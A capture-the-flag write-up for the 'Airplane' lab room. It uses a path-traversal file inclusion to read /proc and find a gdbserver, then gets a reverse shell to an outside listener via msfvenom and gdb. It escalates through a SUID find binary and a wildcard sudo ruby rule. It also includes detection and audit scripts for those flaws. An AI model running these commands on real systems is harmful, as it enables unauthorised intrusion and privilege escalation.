  .clock_task                    : 643028.517425
  .avg_idle                      : 775367
  .max_idle_balance_cost         : 500000

cfs_rq[1]:/autogroup-75
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 200.684759
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : -15571.272838
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 1024
  .throttled                     : 0
  .throttle_count                : 0
  .se->exec_start                : 643028.517425
  .se->vruntime                  : 17527.430112
  .se->sum_exec_runtime          : 192.481980
  .se->load.weight               : 2
  .se->runnable_weight           : 2
  .se->avg.load_avg              : 0
  .se->avg.util_avg              : 0
  .se->avg.runnable_load_avg     : 0

cfs_rq[1]:/
  .exec_clock                    : 0.000000
  .MIN_vruntime                  : 0.000001
  .min_vruntime                  : 17531.774936
  .max_vruntime                  : 0.000001
  .spread                        : 0.000000
  .spread0                       : 1759.817339
  .nr_spread_over                : 0
  .nr_running                    : 0
  .load                          : 0
  .runnable_weight               : 0
  .load_avg                      : 0
  .runnable_load_avg             : 0
  .util_avg                      : 0
  .util_est_enqueued             : 0
  .removed.load_avg              : 0
  .removed.util_avg              : 0
  .removed.runnable_sum          : 0
  .tg_load_avg_contrib           : 0
  .tg_load_avg                   : 0
  .throttled                     : 0
  .throttle_count                : 0

rt_rq[1]:
  .rt_nr_running                 : 0
  .rt_nr_migratory               : 0
  .rt_throttled                  : 0
  .rt_time                       : 0.025151
  .rt_runtime                    : 950.000000

dl_rq[1]:
  .dl_nr_running                 : 0
  .dl_nr_migratory               : 0
  .dl_bw->bw                     : 996147
  .dl_bw->total_bw               : 0

runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1       537.273494      2350   120         0.000000       859.165562         0.000000 0 0 /autogroup-2
 S       kthreadd     2     14984.839338       151   120         0.000000         4.802150         0.000000 0 0 /
 I      rcu_sched    10     17525.908859     11330   120         0.000000       131.406498         0.000000 0 0 /
 S        cpuhp/1    15       949.558725        11   120         0.000000         0.213851         0.000000 0 0 /
 S  idle_inject/1    16        -3.000000         3    49         0.000000         0.000000         0.000000 0 0 /
 S    migration/1    17        37.019061       271     0         0.000000         3.809587         0.000000 0 0 /
 S    ksoftirqd/1    18     17524.158281       696   120         0.000000        44.243722         0.000000 0 0 /
 I   kworker/1:0H    20       709.399861         5   100         0.000000         0.032308         0.000000 0 0 /
 S      kdevtmpfs    21      4698.593452       174   120         0.000000         3.691691         0.000000 0 0 /
 I          netns    22         4.951421         2   100         0.000000         0.000000         0.000000 0 0 /
 Srcu_tasks_kthre    23         2.958667         2   120         0.000000         0.007244         0.000000 0 0 /
 S        kauditd    24      7533.989746        23   120         0.000000         0.539318         0.000000 0 0 /
 I    kworker/1:1    25     15014.225783       583   120         0.000000        29.198933         0.000000 0 0 /
 S     khungtaskd    26     17406.420670         7   120         0.000000         0.259229         0.000000 0 0 /
 S     kcompactd0    29        14.958661         2   120         0.000000         0.000000         0.000000 0 0 /
 S     khugepaged    31        14.958661         2   139         0.000000         0.000000         0.000000 0 0 /
 I        kblockd    78        20.979452         2   100         0.000000         0.000000         0.000000 0 0 /
 I     tpm_dev_wq    80        60.960859         2   100         0.000000         0.006523         0.000000 0 0 /
 I             md    82        66.960856         2   100         0.000000         0.000000         0.000000 0 0 /
 I     devfreq_wq    84        66.960856         2   100         0.000000         0.000000         0.000000 0 0 /
 S        kswapd0    88       210.839317         3   120         0.000000         0.022832         0.000000 0 0 /
 Secryptfs-kthrea    89       174.713319         2   120         0.000000         0.014811         0.000000 0 0 /
 I       kthrotld    91       186.754519         2   100         0.000000         0.014095         0.000000 0 0 /
 I  ipv6_addrconf    94       227.065585         2   100         0.000000         0.025127         0.000000 0 0 /
 I   kworker/u5:0   106       247.930495         2   100         0.000000         0.012630         0.000000 0 0 /
 I        nvme-wq   154       482.722329         2   100         0.000000         0.011813         0.000000 0 0 /
 I            ena   155       487.385448         2   100         0.000000         0.020031         0.000000 0 0 /
 I  nvme-reset-wq   156       492.844671         2   100         0.000000         0.017892         0.000000 0 0 /
 I nvme-delete-wq   157       499.654263         2   100         0.000000         0.005614         0.000000 0 0 /
 Sjbd2/nvme0n1p5-   181     17525.060853     13317   120         0.000000       392.987924         0.000000 0 0 /
 I   kworker/1:1H   194     17524.980428       291   100         0.000000         2.365119         0.000000 0 0 /
 Ssystemd-journal   223        99.302072      1153   119         0.000000       266.193735         0.000000 0 0 /autogroup-3
 I    kworker/1:3   241     15014.188993      1522   120         0.000000        40.560353         0.000000 0 0 /
 S          loop1   265      7478.823442        88   100         0.000000         1.578729         0.000000 0 0 /
 S          loop4   268      7478.825162        84   100         0.000000         1.045874         0.000000 0 0 /
 Ssystemd-network   292        65.517126       101   120         0.000000        69.584368         0.000000 0 0 /autogroup-27
 S     sd-resolve   301         9.288157        16   120         0.000000         2.727973         0.000000 0 0 /autogroup-30
 S          gdbus   482        22.249785       139   120         0.000000        10.277133         0.000000 0 0 /autogroup-35
 S          acpid   367         0.730278        16   120         0.000000         3.419987         0.000000 0 0 /autogroup-39
 S        anacron   368       399.643480        15   120         0.000000         4.206220         0.000000 0 0 /autogroup-36
 S   avahi-daemon   370        11.235924       261   120         0.000000        27.676736         0.000000 0 0 /autogroup-38
 S NetworkManager   376        27.763274       481   120         0.000000        56.933748         0.000000 0 0 /autogroup-43
 S     irqbalance   383         6.756058        74   120         0.000000        24.759695         0.000000 0 0 /autogroup-48
 S          gmain   413         1.209262         1   120         0.000000         0.048343         0.000000 0 0 /autogroup-48
 Snetworkd-dispat   385        67.180817       306   120         0.000000       113.420676         0.000000 0 0 /autogroup-49
 S          gmain   434         0.010884         2   120         0.000000         0.038980         0.000000 0 0 /autogroup-52
 S       rsyslogd   388         9.716708        33   120         0.000000         7.026272         0.000000 0 0 /autogroup-50
 S          snapd   390        18.949459       238   120         0.000000        29.738045         0.000000 0 0 /autogroup-55
 S          snapd   488        13.035884        51   120         0.000000         1.543868         0.000000 0 0 /autogroup-55
 S          snapd   489        13.002454         3   120         0.000000         0.114835         0.000000 0 0 /autogroup-55
 S          snapd   623      3902.615575      7307   120         0.000000      2116.799904         0.000000 0 0 /autogroup-55
 S          snapd  1004      3852.665994      6527   120         0.000000      2155.894714         0.000000 0 0 /autogroup-55
 Sswitcheroo-cont   391         6.371254        46   120         0.000000        16.118601         0.000000 0 0 /autogroup-54
 S          gmain   430         5.380134         1   120         0.000000         0.043780         0.000000 0 0 /autogroup-54
 S          gdbus   481        12.314453        14   120         0.000000         0.703130         0.000000 0 0 /autogroup-54
 S systemd-logind   395        31.517685       934   120         0.000000       117.482963         0.000000 0 0 /autogroup-57
 S          gdbus   484        16.555120        57   120         0.000000         3.928079         0.000000 0 0 /autogroup-56
 S probing-thread   527        14.087137         4   120         0.000000         0.082630         0.000000 0 0 /autogroup-56
 S          cupsd   473        10.929448        72   120         0.000000        16.159782         0.000000 0 0 /autogroup-67
 S   cups-browsed   485        10.060922       216   120         0.000000        27.970460         0.000000 0 0 /autogroup-69
 S          gmain   521         2.605798         1   120         0.000000         0.040173         0.000000 0 0 /autogroup-69
 S          gdbus   522         7.039665        41   120         0.000000         5.304445         0.000000 0 0 /autogroup-69
 S        python3   532       200.684759      1597   120         0.000000       302.964948         0.000000 0 0 /autogroup-75
 Sunattended-upgr   536        74.051800       218   120         0.000000        96.935569         0.000000 0 0 /autogroup-77
 S          gmain   621        75.722099         1   120         0.000000         0.029839         0.000000 0 0 /autogroup-77
 S           sshd   552         9.479976         9   120         0.000000        11.746325         0.000000 0 0 /autogroup-80
 Samazon-ssm-agen   553        25.588294       244   120         0.000000        29.271736         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   601        10.365611        32   120         0.000000         0.565753         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   602        19.907144        18   120         0.000000         4.026165         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   603        21.117699        47   120         0.000000         3.266141         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   604        19.855548         2   120         0.000000         0.085098         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   624        44.390512       174   120         0.000000        15.582552         0.000000 0 0 /autogroup-81
 Samazon-ssm-agen   625        43.679397       237   120         0.000000        14.789134         0.000000 0 0 /autogroup-81
 I    kworker/1:5   556     17526.046283      1708   120         0.000000        35.342229         0.000000 0 0 /
 S          gmain   572         2.302931         2   120         0.000000         0.127739         0.000000 0 0 /autogroup-84
 S     kerneloops   563         2.882907        18   120         0.000000         4.390081         0.000000 0 0 /autogroup-87
 S     kerneloops   565         1.309372        17   120         0.000000         5.467969         0.000000 0 0 /autogroup-89
 t       airplane   569         8.352077         6   120         0.000000         1.493160         0.000000 0 0 /autogroup-74
 S          gmain   656        54.205485         3   120         0.000000         0.147337         0.000000 0 0 /autogroup-95
 S        systemd   665        12.808756       106   120         0.000000        84.281211         0.000000 0 0 /autogroup-98
 S       (sd-pam)   666         2.382076         1   120         0.000000         0.255692         0.000000 0 0 /autogroup-98
 S    dbus-daemon   674         8.648518       101   120         0.000000        11.644721         0.000000 0 0 /autogroup-102
 S   rtkit-daemon   679         6.291148        31   121         0.000000         6.508985         0.000000 0 0 /autogroup-103
 S   rtkit-daemon   681         0.000000        88     0         0.000000         1.925818         0.000000 0 0 /autogroup-103
 Sgdm-session-wor   711        60.250730       118   120         0.000000        15.312143         0.000000 0 0 /autogroup-95
 S          gmain   713        54.498284         5   120         0.000000         0.125817         0.000000 0 0 /autogroup-95
 S    InputThread   737        74.937758         4   120         0.000000         0.137840         0.000000 0 0 /autogroup-105
 S    dbus-daemon   741      2447.123408       811   120         0.000000        84.505766         0.000000 0 0 /autogroup-105
 Sgnome-session-b   742      2440.524676       218   120         0.000000        49.776167         0.000000 0 0 /autogroup-105
 S          gdbus   764      2440.615243       385   120         0.000000        26.849419         0.000000 0 0 /autogroup-105
 Sat-spi-bus-laun   745       245.115815        34   120         0.000000         5.221875         0.000000 0 0 /autogroup-105
 S          gmain   746        95.522980         2   120         0.000000         0.080964         0.000000 0 0 /autogroup-105
 S   dconf worker   747       102.551490        10   120         0.000000         1.028514         0.000000 0 0 /autogroup-105
 S          gdbus   749       245.415845        26   120         0.000000         1.825463         0.000000 0 0 /autogroup-105
 S    gnome-shell   782      2477.017748      4977   120         0.000000      2296.556864         0.000000 0 0 /autogroup-105
 S          gdbus   787      2447.218177       819   120         0.000000        58.263072         0.000000 0 0 /autogroup-105
 S     llvmpipe-1   791      2470.925577       769   120         0.000000       675.515767         0.000000 0 0 /autogroup-105
 S    gnome-shell   792       292.549162         1   120         0.000000         0.020753         0.000000 0 0 /autogroup-105
 S    gnome-shell   793       304.540428         1   120         0.000000         0.053863         0.000000 0 0 /autogroup-105
 S gnome-s:disk$0   794      1668.046363        19   139         0.000000         4.254597         0.000000 0 0 /autogroup-105
 S          gmain   812       669.178217         3   120         0.000000         0.271988         0.000000 0 0 /autogroup-105
 S          gmain   818       684.211867         1   120         0.000000         0.047456         0.000000 0 0 /autogroup-105
 S       ibus-x11   817      1710.261956       117   120         0.000000        28.098516         0.000000 0 0 /autogroup-105
 S          gdbus   825       707.760876         2   120         0.000000         0.143083         0.000000 0 0 /autogroup-105
 S          gmain   830       746.170508         2   120         0.000000         0.068172         0.000000 0 0 /autogroup-105
 S          gmain   828       728.449731         1   120         0.000000         0.053425         0.000000 0 0 /autogroup-105
 S          gdbus   829      1293.811322        42   120         0.000000         3.598901         0.000000 0 0 /autogroup-105
 Sxdg-permission-   834      1229.402935        20   120         0.000000         6.262062         0.000000 0 0 /autogroup-105
 S          gdbus   837      1229.225627        23   120         0.000000         1.555898         0.000000 0 0 /autogroup-105
 S     pulseaudio   842         3.873497        84   109         0.000000        48.211883         0.000000 0 0 /autogroup-110
 S      null-sink   843         0.000000        20    94         0.000000         0.667607         0.000000 0 0 /autogroup-110
 S     snapd-glib   844         3.788302         1   120         0.000000         0.136552         0.000000 0 0 /autogroup-110
 S      JS Helper   861      1738.934353        16   120         0.000000         2.121665         0.000000 0 0 /autogroup-105
 S      JS Helper   862      1739.440298         9   120         0.000000         2.534715         0.000000 0 0 /autogroup-105
 S          gmain   863      1155.784364         1   120         0.000000         0.051073         0.000000 0 0 /autogroup-105
 S          gdbus   864      1210.818127        18   120         0.000000         1.848280         0.000000 0 0 /autogroup-105
 S          gmain   907      1250.545843         1   120         0.000000         0.033569         0.000000 0 0 /autogroup-105
 S      gsd-wacom   869      1737.272560       202   120         0.000000        40.963231         0.000000 0 0 /autogroup-105
 S          gmain   927      1271.201773         2   120         0.000000         0.060739         0.000000 0 0 /autogroup-105
 S          gdbus   968      1293.111429        34   120         0.000000         1.922080         0.000000 0 0 /autogroup-105
 S      gsd-color   871      2469.967462       373   120         0.000000        38.750066         0.000000 0 0 /autogroup-105
 S          gdbus   947      2446.986934       185   120         0.000000        13.477612         0.000000 0 0 /autogroup-105
 S   gsd-keyboard   872      1737.288195       205   120         0.000000        27.573433         0.000000 0 0 /autogroup-105
 S          gmain   928      1255.390821         1   120         0.000000         0.046543         0.000000 0 0 /autogroup-105
 S          gdbus   934      1737.336962       103   120         0.000000         5.055173         0.000000 0 0 /autogroup-105
 Sgsd-print-notif   873      1293.039330        86   120         0.000000        13.187106         0.000000 0 0 /autogroup-105
 S          gdbus   911      1293.105662        54   120         0.000000         3.657100         0.000000 0 0 /autogroup-105
 S          gmain   893      1242.598002         1   120         0.000000         0.031651         0.000000 0 0 /autogroup-105
 Spool-gsd-smartc   905      1254.487901         3   120         0.000000         0.132032         0.000000 0 0 /autogroup-105
 S   dconf worker   906      1250.678952         2   120         0.000000         0.166677         0.000000 0 0 /autogroup-105
 S   dconf worker   956      1271.045566         2   120         0.000000         0.143373         0.000000 0 0 /autogroup-105
 S gsd-media-keys   877      1769.329104       232   120         0.000000        39.759048         0.000000 0 0 /autogroup-105
 S   dconf worker   948      1268.656120         6   120         0.000000         0.407456         0.000000 0 0 /autogroup-105
 Sgsd-screensaver   879      1293.037631        51   120         0.000000         7.014632         0.000000 0 0 /autogroup-105
 S          gdbus   903      1293.118100        49   120         0.000000         3.635045         0.000000 0 0 /autogroup-105
 S      gsd-sound   881      1293.037772        52   120         0.000000        10.824817         0.000000 0 0 /autogroup-105
 S          gmain   897      1244.524906         2   120         0.000000         0.056686         0.000000 0 0 /autogroup-105
 S          gdbus   899      1293.116441        49   120         0.000000         3.841359         0.000000 0 0 /autogroup-105
 S   dconf worker   913      1248.037070         7   120         0.000000         0.153213         0.000000 0 0 /autogroup-105
 S          gmain   889      1239.634513         2   120         0.000000         0.068539         0.000000 0 0 /autogroup-105
 S          gdbus   902      1293.102228        67   120         0.000000         3.351349         0.000000 0 0 /autogroup-105
 S   dconf worker   910      1737.229500         8   120         0.000000         0.313753         0.000000 0 0 /autogroup-105
 S      gsd-power   888      2457.769762       216   120         0.000000        34.972179         0.000000 0 0 /autogroup-105
 S          gdbus   935      2447.212700       123   120         0.000000         9.418665         0.000000 0 0 /autogroup-105
 S   dconf worker   942      1264.351468         2   120         0.000000         0.266798         0.000000 0 0 /autogroup-105
 S          gmain   961      1273.202341         1   120         0.000000         0.049129         0.000000 0 0 /autogroup-105
 S          gmain   972       146.977017         3   120         0.000000         0.105909         0.000000 0 0 /autogroup-114
 Ssystemd-timedat  1007       174.555389      2220   120         0.000000       281.078772         0.000000 0 0 /autogroup-116
 I   kworker/u4:1  1159     17525.820074       101   120         0.000000         2.671951         0.000000 0 0 /
 Supdate-notifier  1187       401.004846         4   120         0.000000         0.313600         0.000000 0 0 /autogroup-36

The file contains a section labeled "runnable tasks", which lists all the tasks (processes or threads) that the scheduler is tracking on that CPU. The S column shows the process status (S: Sleeping, R: Running, I: Idle).

Extracting information from these processes (PIDs):

We can try to fetch the command-line arguments of the various processes by substituting each PID into /proc/[pid]/cmdline. Doing this by hand is not practical, because the sched_debug file lists a lot of processes. A script is what helps here.

The script:

This is a simple script written in bash:

curl "http://airplane.thm:8000/?page=../../../../../../proc/sched_debug" | awk '/^runnable tasks:/,/^$/ {if ($3 ~ /^[0-9]+$/) print $3}' | while IFS= read -r pid; do
    echo "PID $pid cmdline:"
    curl --output - "http://airplane.thm:8000/?page=../../../../../../proc/$pid/cmdline"
    echo -e "\n--------------------------------------------------"
done

Explanation:

This fetches the contents of the sched_debug file:

curl "http://airplane.thm:8000/?page=../../../../../../proc/sched_debug"

/^runnable tasks:/,/^$/: This part tells awk to look for lines starting with runnable tasks: and continue until it finds an empty line.

{if ($3 ~ /^[0-9]+$/) print $3}: Inside the runnable tasks section, it checks if the third column ($3) is a number (PID) and then it prints that number:

| awk '/^runnable tasks:/,/^$/ {if ($3 ~ /^[0-9]+$/) print $3}'

This takes each PID found by awk and loops through them:

| while IFS= read -r pid; do

For each PID, it then fetches and displays its cmdline:

    echo "PID $pid cmdline:"
    curl --output - "http://airplane.thm:8000/?page=../../../../../../proc/$pid/cmdline"
    echo -e "\n--------------------------------------------------"
done
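Seen from the server side, the loop above leaves a distinctive trail in the web log: many ?page= requests that resolve outside the web root, walking /proc/<pid>/cmdline. The following is an added detection example, not part of the original write-up; the log lines are constructed in the Werkzeug development-server format, and WEB_ROOT and the threshold are assumptions.

```python
import re
from collections import defaultdict
from posixpath import normpath
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (Werkzeug development-server log format).
SAMPLE_LOG = """\
10.11.75.84 - - [07/Jun/2024 18:41:02] "GET /?page=index.html HTTP/1.1" 200 -
10.11.75.84 - - [07/Jun/2024 18:41:10] "GET /?page=../../../../../../proc/sched_debug HTTP/1.1" 200 -
10.11.75.84 - - [07/Jun/2024 18:41:11] "GET /?page=../../../../../../proc/1/cmdline HTTP/1.1" 200 -
10.11.75.84 - - [07/Jun/2024 18:41:11] "GET /?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2F532%2Fcmdline HTTP/1.1" 200 -
10.11.75.84 - - [07/Jun/2024 18:41:12] "GET /?page=../../../../../../proc/569/cmdline HTTP/1.1" 200 -
192.0.2.7 - - [07/Jun/2024 18:42:00] "GET /?page=airplane.html HTTP/1.1" 200 -
"""

WEB_ROOT = "/srv/app/static"  # assumed document root, not taken from the page

LINE_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PROC_PID_RE = re.compile(r"^/proc/(\d+)(?:/|$)")


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e), up to a small bound."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve(value, web_root=WEB_ROOT):
    """Resolve the parameter the way a naive open(web_root + '/' + page) would."""
    value = fully_decode(value)
    if value.startswith("/"):          # absolute path supplied directly
        return normpath(value)
    return normpath(web_root + "/" + value)


def analyse(log_text, param="page", web_root=WEB_ROOT, pid_threshold=3):
    """Return requests that leave the web root and clients walking /proc/<pid>."""
    traversal = []
    pids_by_client = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for value in parse_qs(query).get(param, []):   # parse_qs decodes once
            resolved = resolve(value, web_root)
            if resolved == web_root or resolved.startswith(web_root + "/"):
                continue                               # stays inside the web root
            traversal.append({
                "client": m["ip"],
                "time": m["ts"],
                "resolved": resolved,
                "status": int(m["status"]),
            })
            pid = PROC_PID_RE.match(resolved)
            if pid:
                pids_by_client[m["ip"]].add(int(pid.group(1)))
    enumeration = {
        ip: sorted(pids)
        for ip, pids in pids_by_client.items()
        if len(pids) >= pid_threshold
    }
    return {"traversal": traversal, "proc_enumeration": enumeration}


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for hit in report["traversal"]:
        print(f'{hit["time"]} {hit["client"]} -> {hit["resolved"]} ({hit["status"]})')
    for client, pids in report["proc_enumeration"].items():
        print(f"{client} enumerated /proc PIDs: {pids}")
```

The same resolve-then-compare check, placed in the request handler before the file is opened, is what closes the inclusion bug in the first place.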

Running the script:

We then come across this cmdline that stands out:

/usr/bin/gdbserver0.0.0.0:6048airplane

We now know exactly what is running on port 6048: gdbserver, a tool that enables remote debugging of programs.

Based on the command line, gdbserver is listening on all network interfaces (0.0.0.0) on port 6048, and the executable it is debugging is airplane.
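The cmdline above looks run together because /proc/<pid>/cmdline separates arguments with NUL bytes, not spaces. The following added example (not from the original write-up) is a host-side audit that splits those bytes correctly and reports any gdbserver with a TCP listener; the sample byte strings and PIDs are constructed, and app.py is a hypothetical name.

```python
import os

TCP_PREFIXES = ("tcp4:", "tcp6:", "tcp:")

# Constructed samples: raw bytes as they appear in /proc/<pid>/cmdline.
SAMPLE_CMDLINES = {
    4001: b"/usr/bin/gdbserver\x000.0.0.0:6048\x00airplane\x00",
    4002: b"/usr/bin/python3\x00app.py\x00",
    4003: b"gdbserver\x00--once\x00-\x00/bin/true\x00",   # stdio transport
    4004: b"",                                            # kernel thread
}


def split_cmdline(raw):
    """Split NUL-separated argv bytes; kernel threads have an empty cmdline."""
    if not raw:
        return []
    return [a.decode("utf-8", "replace") for a in raw.rstrip(b"\0").split(b"\0")]


def classify_comm(comm):
    """Classify gdbserver's COMM argument as stdio, tcp or a local device."""
    if comm in ("-", "stdio"):
        return "stdio", None, None
    spec = comm
    for prefix in TCP_PREFIXES:
        if spec.startswith(prefix):
            spec = spec[len(prefix):]
            break
    host, sep, port = spec.rpartition(":")
    if sep and port.isdigit():
        return "tcp", host.strip("[]") or "*", int(port)
    return "device", None, None


def parse_gdbserver(argv):
    """Return transport details if argv is a gdbserver invocation, else None."""
    if not argv or os.path.basename(argv[0]) != "gdbserver":
        return None
    args = iter(argv[1:])
    options, comm = [], None
    for arg in args:
        if arg == "--wrapper":            # --wrapper CMD ... -- : skip the wrapper
            options.append(arg)
            for wrapped in args:
                if wrapped == "--":
                    break
        elif arg.startswith("--"):
            options.append(arg)
        else:
            comm = arg                    # first non-option argument is COMM
            break
    if comm is None:
        return None
    transport, host, port = classify_comm(comm)
    return {"transport": transport, "host": host, "port": port,
            "options": options, "target": list(args)}


def audit(cmdlines):
    """Report every gdbserver with a TCP listener. Any TCP form is treated as
    network-reachable; do not rely on the host part to restrict the listener."""
    findings = []
    for pid, raw in sorted(cmdlines.items()):
        info = parse_gdbserver(split_cmdline(raw))
        if info and info["transport"] == "tcp":
            findings.append(dict(info, pid=pid))
    return findings


def read_proc(proc_root="/proc"):
    """Collect raw cmdline bytes for every PID on the local Linux host."""
    cmdlines = {}
    if not os.path.isdir(proc_root):
        return cmdlines
    for entry in os.listdir(proc_root):
        if entry.isdigit():
            try:
                with open(os.path.join(proc_root, entry, "cmdline"), "rb") as fh:
                    cmdlines[int(entry)] = fh.read()
            except OSError:
                continue                  # process exited or access denied
    return cmdlines


if __name__ == "__main__":
    for f in audit(SAMPLE_CMDLINES):      # use audit(read_proc()) on a live host
        print(f'PID {f["pid"]}: gdbserver on {f["host"]}:{f["port"]} -> {f["target"]}')
```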

This executable can also be found running as a process:

This binary can be downloaded via LFI as we have its location, and it can be run:

Command:

curl --output airplane http://airplane.thm:8000/\?page\=../../../../opt/airplane

Reverse engineering it turned up nothing interesting. Let us go back to the gdbserver and find ways to exploit it.

Metasploit Exploit:

We have to set the RHOSTS, RPORT, LPORT and the target architecture, on which the payload will be based.

First up, we have to find the target machine's architecture. We can do that by fetching the /proc/version file:

Command:

curl --output - http://airplane.thm:8000/\?page\=../../../../proc/version

This file specifies the version of the Linux kernel, the version of gcc used to compile the kernel, and the time of kernel compilation.

It says amd64, so it is a 64-bit machine. The target can now be set to x86_64 (Id - 1).

Setting up the options:

Running the exploit:

We have got a shell as the user hudson. The same can be done without using Metasploit too.

Exploitation w/o Metasploit:

Commands:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.11.75.84 LPORT=5555 PrependFork=true -f elf -o binary.elf  # The IP here is the tun0 interface IP

Now set up a listener on port 5555:

chmod +x binary.elf
gdb binary.elf  # If gdb isn't installed, type in: apt install gdb -y
target extended-remote airplane.thm:6048

remote put binary.elf /tmp/binary.elf

set remote exec-file /tmp/binary.elf

run

We can place the binary in the /tmp directory as it is world-writable:

The moment we type in run, we can see we have got a connection on the listener on port 5555:

Now we can upgrade the shell a little by running this:

Commands:

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

The user flag is within carlos's home directory:

Command:

find / -name user.txt 2> /dev/null

So now we have to laterally move to carlos from hudson, unless we directly get to root.

Enumeration:

Checking for binaries that have the SUID bit set:

Command:

find / -perm -u=s -type f 2>/dev/null

The find binary has the SUID bit set. A file with the SUID bit set runs with the privileges of its owner.

Searching in GTFOBins:

Command:

find . -exec /bin/sh -p \; -quit

The EUID (effective user ID) is now carlos. This means that the shell we got has the effective permissions and privileges of the user carlos, while the real user ID is still hudson, so the session itself is still in the context of hudson.

The user flag can be found in carlos's home directory:

We can now generate an SSH key pair and place the public key on the target machine inside the .ssh directory within carlos's home directory as authorized_keys:

Command:

ssh-keygen -t rsa

Now we can SSH in as carlos:

Command:

ssh carlos@airplane.thm

Now we have a full-fledged shell as carlos.

Privilege Escalation:

We can now check carlos's sudo rights:

The command /usr/bin/ruby /root/*.rb can be run as any user without us being prompted for a password. By making use of that command we can get to root.

The security risk:

The problem here is that the command /usr/bin/ruby /root/*.rb has a wildcard character (*) in its path argument, and we can run it with sudo, that is, with elevated privileges. * matches any character (including whitespace), so we can point the path wherever we need with a simple path traversal. We can get a root shell this way.

Command:

echo '`chmod u+s /bin/bash`' > shell.rb

When run with elevated privileges, the file will set the SUID bit on the bash binary.

The command can be run within carlos's home directory since, as carlos, we have write permission on it:

Getting a root shell:

Command:

sudo /usr/bin/ruby /root/../../home/carlos/shell.rb

Now let us check out the bash binary:

The SUID bit has indeed been set.

Now we can just type in this to get a root shell:

Command:

bash -p

When bash is invoked with the -p option, it starts in privileged mode. Normally, when bash starts, it drops certain privileges for security reasons. The -p flag prevents bash from doing this.

We are root.

A simpler way to do the same would be directly spawning a bash shell, like so:

Now we can fetch the root flag from the /root directory.
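For reviewing sudoers entries like the one abused above, the following added example (not part of the original write-up) flags rules whose arguments contain wildcards and shows why /root/*.rb also admits a path that resolves outside /root. The sudo -l header line, maintenance.rb and the hardened rule are constructed; the matcher is a model that assumes sudo joins the arguments into one string in which * is not stopped by / or spaces.

```python
import re
from fnmatch import fnmatchcase
from posixpath import dirname, normpath

# Constructed `sudo -l` output; only the rule itself is taken from the write-up.
SUDO_L_OUTPUT = """\
User carlos may run the following commands on airplane:
    (ALL) NOPASSWD: /usr/bin/ruby /root/*.rb
"""
# Hypothetical hardened rule: one explicit script, no wildcard.
HARDENED_OUTPUT = "    (ALL) NOPASSWD: /usr/bin/ruby /root/maintenance.rb\n"

RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>/.+)$"
)
WILDCARD_RE = re.compile(r"[*?\[]")


def parse_rules(text):
    """Parse the rule lines of `sudo -l` output into dictionaries."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m["cmds"].split(","):   # simplification: no escaped commas
            command, _, args = spec.strip().partition(" ")
            rules.append({
                "runas": m["runas"],
                "nopasswd": "NOPASSWD:" in m["tags"],
                "command": command,
                "args": args.strip(),
            })
    return rules


def sudo_allows(rule, argv):
    """Model of sudoers matching (assumption stated in the lead-in)."""
    if argv[0] != rule["command"]:
        return False
    if not rule["args"]:
        return True                          # no args in the rule: any allowed
    return fnmatchcase(" ".join(argv[1:]), rule["args"])


def escapes_intended_dir(rule, argv):
    """Return path arguments that resolve outside the rule's literal directory."""
    literal = WILDCARD_RE.split(rule["args"], maxsplit=1)[0]   # "/root/"
    base = normpath(dirname(literal)).rstrip("/") + "/"
    return [
        a for a in argv[1:]
        if a.startswith("/") and not (normpath(a) + "/").startswith(base)
    ]


def audit(text):
    """Flag every rule that has a wildcard in its argument part."""
    return [r for r in parse_rules(text) if WILDCARD_RE.search(r["args"])]


if __name__ == "__main__":
    rule = audit(SUDO_L_OUTPUT)[0]
    hardened = parse_rules(HARDENED_OUTPUT)[0]
    candidates = [
        ["/usr/bin/ruby", "/root/maintenance.rb"],
        ["/usr/bin/ruby", "/root/../../home/carlos/shell.rb"],
        ["/usr/bin/ruby", "/home/carlos/shell.rb"],
    ]
    for argv in candidates:
        print(
            " ".join(argv),
            "| wildcard rule:", sudo_allows(rule, argv),
            "| escapes:", escapes_intended_dir(rule, argv),
            "| hardened rule:", sudo_allows(hardened, argv),
        )
```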

Room solved!!

CC BY-NC 4.0